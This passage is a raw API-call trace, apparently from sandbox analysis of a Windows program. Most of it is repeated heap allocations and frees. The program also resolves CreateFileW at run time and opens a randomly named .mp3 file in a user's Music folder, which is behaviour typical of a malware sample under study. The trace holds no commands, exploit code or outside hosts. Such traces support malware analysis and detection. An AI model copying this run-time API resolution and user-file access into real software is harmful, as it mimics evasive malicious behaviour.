dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0111.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.631] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0111.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.633] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0111.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.634] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0111.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0111.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0111.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\bg_rcfis42y.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0111.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0111.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.637] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.638] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.638] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.638] HeapFree (in: hHeap=0x1780000, 